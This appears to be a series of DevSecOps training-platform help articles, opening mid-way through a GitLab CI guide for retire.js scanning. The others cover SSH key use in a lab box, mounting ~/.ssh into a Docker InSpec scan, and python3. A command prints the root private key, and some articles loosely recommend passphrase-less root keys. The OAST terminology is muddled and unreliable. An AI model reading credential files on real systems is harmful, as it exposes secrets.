Slightly slower (pull + container start) | | Isolation | Lower (shares runner’s filesystem) | Higher (clean environment) | | Dependency conflicts | Possible if runner’s Node version differs | None – image is self‑contained | | CI/CD simplicity | Simpler script, fewer commands | More explicit, easier to swap tools later | Best practice: Start with the lightweight node:alpine approach for quick prototyping. When you move to production‑grade pipelines, switch to the dedicated Docker image to guarantee reproducibility and compliance. 4. Practical Example: Full GitLab CI Configuration stages: - build - test - oast-frontend # ---------- Build ---------- build-app: stage: build image: node:alpine3.10 script: - npm ci # Clean install, generates node_modules - npm run build # Produce dist/ folder artifacts: paths: - node_modules/ - dist/ expire_in: 1 hour # ---------- Test ---------- unit-test: stage: test image: node:alpine3.10 script: - npm test dependencies: - build-app # ---------- OAST Frontend ---------- oast-frontend: stage: oast-frontend image: node:alpine3.10 # Switch to secfigo/retirejs for production script: - npm install -g retire - retire --outputformat json \ --outputpath retirejs-report.json \ --severity high artifacts: paths: - retirejs-report.json expire_in: 2 days dependencies: - build-app The dependencies keyword ensures each job receives the exact node_modules produced by the build step, keeping the SCA scan accurate. 5. Tips & Common Questions ✅ Tips for a Smooth Integration 1. Cache node_modules – Use the CI cache feature to speed up subsequent runs. 2. Fail fast – Add allow_failure: false and a when: on_failure rule to abort the pipeline if the SCA report exceeds a severity threshold. 3. Version pinning – Explicitly set the retire.js version in the Docker image tag (e.g., secfigo/retirejs:2.3.0) to avoid surprise updates. ❓ Common Questions | Question | Answer | |----------|--------| | Do I need both SCA and OAST? | Yes. SCA finds known library issues; OAST uncovers runtime flaws that libraries alone cannot reveal. | | Can I run retire.js without Docker on a Windows runner? | Absolutely. Install Node, run npm install -g retire, then execute the same CLI command. | | What if my pipeline runner doesn’t have Docker installed? | Use the image: approach (Option 1). The tool runs directly in the runner’s environment. | | How do I treat the retirejs-report.json? | Publish it as an artifact, feed it into a security dashboard, or add a script that parses the JSON and fails the job if any “high” severity findings exist. | | Why does the Docker container sometimes break the pipeline? | The container runs as a non‑root user by default, which may lack permission to write to the mounted workspace. Add --user $(id -u):$(id -g) to the docker run command if needed. | Conclusion Combining Software Component Analysis and Open Application Security Testing within a single CI/CD pipeline gives you early visibility into both what you ship and how it behaves under attack. By sequencing the build → test → oast‑frontend stages, you ensure that each security scan works on the exact artifact that passed functional verification. Choose the execution method that matches your organization’s security posture: the lightweight node:alpine image for speed and simplicity, or a dedicated Docker image for isolation and reproducibility. With the example configuration and tips provided, you can now embed robust SCA and OAST checks into any modern DevSecOps workflow.

Last updated on Jan 06, 2026

SSH Key Management in the DevSecOps Box – How It Works, Where It’s Configured, and What You Need to Know

SSH Key Management in the DevSecOps Box – How It Works, Where It’s Configured, and What You Need to Know Managing SSH keys is a core part of any DevSecOps lab. In the DevSecOps Box you can connect to the production environment without specifying a key file each time, and you may wonder why this works, where the configuration lives, and what tools like ssh-agent and ssh-add actually do. This article breaks down the mechanics, points you to the relevant files, and provides practical tips for customizing the setup for your own labs. Table of Contents 1. Why the DevSecOps Box Can SSH to Production Without Extra Flags 2. Where the Private Key Is Stored 3. How SSH Chooses the Correct Key for a Host 4. Configuring Your Own Key Pair 5. The Role of ssh-agent and ssh-add 6. Common Questions & Quick Tips Why the DevSecOps Box Can SSH to Production Without Extra Flags The lab is deliberately pre‑configured so that the root user on the DevSecOps Box already possesses a private key that matches a public key stored on the production host. When you run a plain ssh prod‑host, OpenSSH automatically looks for a private key in the default location (~/.ssh/id_rsa). Because the matching key is present, authentication succeeds without the -i /path/to/key option. Key point: As long as the private key exists at /root/.ssh/id_rsa, the box can reach the production machine. Delete or replace that file and the password‑less login will stop working. Where the Private Key Is Stored | Path | Owner | Purpose | |------|-------|---------| | /root/.ssh/id_rsa | root | Default RSA private key used for all lab SSH connections | | /root/.ssh/id_rsa.pub | root | Corresponding public key (added to authorized_keys on the remote host) | | /root/.ssh/authorized_keys (on the remote host) | root | List of public keys that are allowed to log in | If you inspect the box: # Show the private key (redacted for security) cat /root/.ssh/id_rsa # Verify the public key that the prod host trusts ssh prod-host "cat /root/.ssh/authorized_keys" Removing /root/.ssh/id_rsa breaks the automatic login. How SSH Chooses the Correct Key for a Host OpenSSH follows a simple lookup order: 1. Explicit key via -i flag – overrides everything else. 2. Keys listed in ~/.ssh/config under a Host stanza (e.g., IdentityFile). 3. Default key files (~/.ssh/id_rsa, id_ecdsa, id_ed25519, …). In the DevSecOps Box there is no custom ~/.ssh/config; the system relies on step 3. When you first connect to a new host, SSH asks you to confirm the host’s fingerprint (the “host verification” prompt). After you accept, the connection proceeds, and the remote SSH daemon checks whether the presented public key (derived from the private key you offered) appears in its authorized_keys file. If you need a per‑host key mapping, create a config file: cat > /root/.ssh/config <<'EOF' Host prod HostName 10.0.0.5 User root IdentityFile /root/.ssh/prod_id_rsa EOF chmod 600 /root/.ssh/config Now ssh prod will automatically use /root/.ssh/prod_id_rsa. Configuring Your Own Key Pair 1. Generate a new RSA (or Ed25519) key pair ssh-keygen -t rsa -b 4096 -f /root/.ssh/my_lab_key -N "" # -N "" = no passphrase 2. Copy the public key to the remote host ssh-copy-id -i /root/.ssh/my_lab_key.pub root@prod-host or manually append the key to /root/.ssh/authorized_keys on the remote side. 3. Tell SSH which key to use (optional but recommended for multiple keys) echo -e "Host prod\n IdentityFile /root/.ssh/my_lab_key" >> /root/.ssh/config chmod 600 /root/.ssh/config Now you can connect with ssh prod just as before, but the lab uses your own credentials. The Role of ssh-agent and ssh-add - ssh-agent is a background process that holds private keys in memory, allowing you to use them without re‑entering a passphrase for each connection. - ssh-add loads a private key into the running agent: eval "$(ssh-agent -s)" # start the agent ssh-add /root/.ssh/my_lab_key In CI pipelines (e.g., GitLab CI) you’ll often see a snippet like: before_script: - mkdir -p ~/.ssh - echo "$DEPLOYMENT_SERVER_SSH_PRIVKEY" | tr -d '\r' > ~/.ssh/id_rsa - chmod 600 ~/.ssh/id_rsa - eval "$(ssh-agent -s)" - ssh-add ~/.ssh/id_rsa This sequence creates the key file from a protected variable, starts an agent, and adds the key so subsequent ssh or scp commands run without interactive prompts. Bottom line: In the DevSecOps Box you don’t need ssh-agent for the default key because the key is unencrypted and stored at the default location. You only need an agent when the key is passphrase‑protected or when you want to manage multiple keys securely. Common Questions & Quick Tips | Question | Short Answer | |----------|--------------| | Why does killing ssh-agent not affect my login? | The default key (/root/.ssh/id_rsa) is unencrypted and read directly by ssh; the agent is only required for passphrase‑protected keys. | | Where can I see which key is being offered? | Run ssh -v prod-host; the verbose output shows lines like Offering public key: /root/.ssh/id_rsa. | | Can I store keys outside /root/.ssh? | Yes—place the key anywhere and reference it with -i /path/to/key or via an IdentityFile entry in ~/.ssh/config. | | Do I need to restart the box after changing keys? | No. SSH reads the key file each time a connection is made. Just replace the file and ensure correct permissions (600). | | How do I secure the private key in production? | Use a passphrase, store it in a secret manager, and load it into ssh-agent at runtime (as shown in the CI example). | TL;DR - The DevSecOps Box authenticates to production using the default private key at /root/.ssh/id_rsa. - No explicit configuration file is required; OpenSSH falls back to this default location. - To use a different key or multiple hosts, create a ~/.ssh/config file with IdentityFile directives. - ssh-agent and ssh-add are only needed for passphrase‑protected keys or when you want to avoid typing passwords repeatedly. With this knowledge you can safely modify the lab’s SSH setup, add your own keys, and understand exactly how authentication works under the hood. Happy securing!

Last updated on Jan 07, 2026

Mounting SSH Keys in Docker Containers: Why and How to Use Volume Bind‑Mounts with the `-i` Flag

Mounting SSH Keys in Docker Containers: Why and How to Use Volume Bind‑Mounts with the -i Flag When you run security or compliance scans inside a Docker container, you often need to connect to remote hosts over SSH. A common pattern is to combine the -i option (to point to a private key) with one or more -v volume mounts that expose your local ~/.ssh directory and the current working directory to the container. This article explains why both are required, breaks down each part of the command, and provides practical guidance for using SSH keys safely and efficiently in Docker‑based DevSecOps workflows. Table of Contents 1. Understanding the docker run command 2. Why mount ~/.ssh as a volume? 3. The role of the -i flag 4. Why two -v flags? 5. Step‑by‑step example 6. Best practices & security tips 7. Common questions Understanding the docker run command A typical invocation for running the InSpec Docker image against a remote server looks like this: docker run --rm \ -v ~/.ssh:/root/.ssh \ -v $(pwd):/share \ hysnsec/inspec exec https://github.com/dev-sec/linux-baseline.git \ -t ssh://root@$DEPLOYMENT_SERVER \ -i ~/.ssh/id_rsa \ --chef-license accept | Segment | Purpose | |--------|---------| | --rm | Remove the container automatically when it exits. | | -v ~/.ssh:/root/.ssh | Bind‑mount the host’s SSH directory into the container. | | -v $(pwd):/share | Share the current host directory (e.g., test files, profiles) with the container. | | hysnsec/inspec | Docker image that contains the InSpec scanner. | | exec … | InSpec command to run a compliance profile from GitHub. | | -t ssh://root@$DEPLOYMENT_SERVER | Target remote host via SSH. | | -i ~/.ssh/id_rsa | Path to the private key inside the container. | | --chef-license accept | Auto‑accept the Chef license required by InSpec. | Why mount ~/.ssh as a volume? 1. Provides the full SSH configuration The -i flag only points to a single private key file. Real‑world SSH setups often rely on additional files: - ~/.ssh/config (host aliases, proxy commands, preferred algorithms) - Known hosts file ~/.ssh/known_hosts (pre‑trusted fingerprints) - Additional keys (id_ecdsa, id_ed25519, etc.) Mounting the entire ~/.ssh directory makes all of these files available to the container, ensuring the SSH client inside Docker behaves exactly like the one on your host. 2. Keeps the path consistent Inside the container the default user is root, whose home directory is /root. By mapping ~/.ssh to /root/.ssh, the container’s SSH client automatically finds the keys without needing to adjust environment variables or copy files manually. 3. Avoids copy‑and‑paste errors If you only passed -i ~/.ssh/id_rsa, you would still need to copy the key into the container’s filesystem or set SSH_AUTH_SOCK. A bind‑mount is a single, declarative step that guarantees the key is present where the SSH client expects it. The role of the -i flag - Scope: Tells InSpec (or any underlying SSH client) which private key to use for authentication inside the container. - Syntax: -i /path/to/key – the path is evaluated relative to the container’s filesystem. - Why it still matters: Even though the whole .ssh directory is mounted, InSpec does not automatically select a key. Explicitly specifying -i removes ambiguity, especially when multiple keys exist. Bottom line: -v ~/.ssh:/root/.ssh makes the key available; -i ~/.ssh/id_rsa tells the tool which key to use. Why two -v flags? Docker allows multiple volume bind‑mounts in a single docker run. Each -v maps a distinct host path to a distinct container path: | Flag | Host path | Container path | Typical use case | |------|-----------|----------------|------------------| | -v ~/.ssh:/root/.ssh | Your local SSH configuration (~/.ssh) | /root/.ssh (root’s home) | Provide SSH keys & config | | -v $(pwd):/share | The directory you are currently in ($(pwd)) | /share | Share InSpec profiles, scripts, or output files with the container | Using both mounts lets you interact with remote hosts (via SSH) and work with local test assets without copying them into the image. Step‑by‑step example 1. Prepare your environment export DEPLOYMENT_SERVER=10.0.1.23 cd ~/my-inspec-profiles # Directory containing custom controls 2. Run the scan docker run --rm \ -v ~/.ssh:/root/.ssh \ -v $(pwd):/share \ hysnsec/inspec exec https://github.com/dev-sec/linux-baseline.git \ -t ssh://root@$DEPLOYMENT_SERVER \ -i ~/.ssh/id_rsa \ --chef-license accept 3. Inspect results The scan writes its report to standard output. If you want a file on the host, add a volume for a reports folder: -v $(pwd)/reports:/reports \ ... \ --reporter json:/reports/report.json Best practices & security tips - Least‑privilege keys: Use a dedicated SSH key with limited permissions (e.g., read‑only sudo) for scanning. - Read‑only mount: Prevent accidental modification of host keys by mounting read‑only: -v ~/.ssh:/root/.ssh:ro - Avoid embedding secrets in images: Never COPY ~/.ssh into a Dockerfile; always use bind‑mounts at runtime. - Clean up: The --rm flag ensures the container disappears after the run, but the host’s key files remain untouched. - Use SSH agent forwarding (advanced): If you prefer not to expose private keys, start the container with -v $SSH_AUTH_SOCK:/ssh-agent -e SSH_AUTH_SOCK=/ssh-agent and omit the -i flag. Common Questions | Question | Answer | |----------|--------| | Do I still need -i if I mount the whole .ssh directory? | Yes. The mount makes the key visible; -i tells InSpec which key to present to the remote host. | | Can I mount only a single key file instead of the whole directory? | Technically, you could -v ~/.ssh/id_rsa:/root/.ssh/id_rsa. However, you would lose config and known_hosts, which may cause host‑key verification failures. | | What if my host uses a non‑standard SSH config location? | Adjust the mount accordingly, e.g., -v /custom/ssh:/root/.ssh. | | Is it safe to share the entire current directory with the container? | Generally yes, but avoid mounting sensitive files (password files, tokens) unless required. Use a dedicated sub‑directory if you need tighter control. | Takeaway Mounting ~/.ssh as a Docker volume supplies the container with all the SSH artefacts it needs, while the -i flag explicitly selects the private key for authentication. The second -v flag shares your local work directory, enabling seamless interaction between host and container. By following the best‑practice checklist above, you can run DevSecOps scans securely, reproducibly, and without exposing secret material inside Docker images.

Last updated on Jan 07, 2026

Python Command Not Found Error and How to Fix It Using Python3

Overview In some systems, especially modern Linux and macOS environments, the python command may not be available by default. When users try to run Python scripts or execute Python commands, they may encounter an error such as command not found or python: not found. This behavior is expected and usually means that Python is installed on the system under the python3 command instead of python. Why This Happens Many operating systems have moved to Python 3 as the default version. To avoid confusion with the deprecated Python 2, the python command is sometimes not created automatically. As a result, users must explicitly use python3 when running Python commands. This is common on: - Linux distributions such as Ubuntu, Debian, and CentOS - macOS systems - Cloud based or containerized environments - Minimal or hardened lab environments How to Resolve the Issue If you encounter an error indicating that the python command is not found, simply replace it with python3. This ensures that you are using the correct Python interpreter that is installed on the system. Examples Example 1: Running a Python script If this command fails: python script.py Use this instead: python3 script.py Example 2: Checking the Python version If this command returns an error: python --version Use: python3 --version Example 3: Starting the Python interactive shell If this does not work: python Use: python3 Example 4: Running a one line Python command Instead of: python -c "print('Hello World')" Use: python3 -c "print('Hello World')" Additional Notes - Always verify which Python version is required for your project or script. - Some environments may allow you to create an alias from python to python3, but this depends on system permissions and is not always recommended in shared or exam environments. - Using python3 explicitly helps avoid compatibility issues and ensures consistent behavior. Summary If you see an error stating that the python command is not found, it usually means Python 3 is installed but must be invoked using python3. Switching to python3 is a quick and reliable solution that works across most modern systems.

Last updated on Feb 11, 2026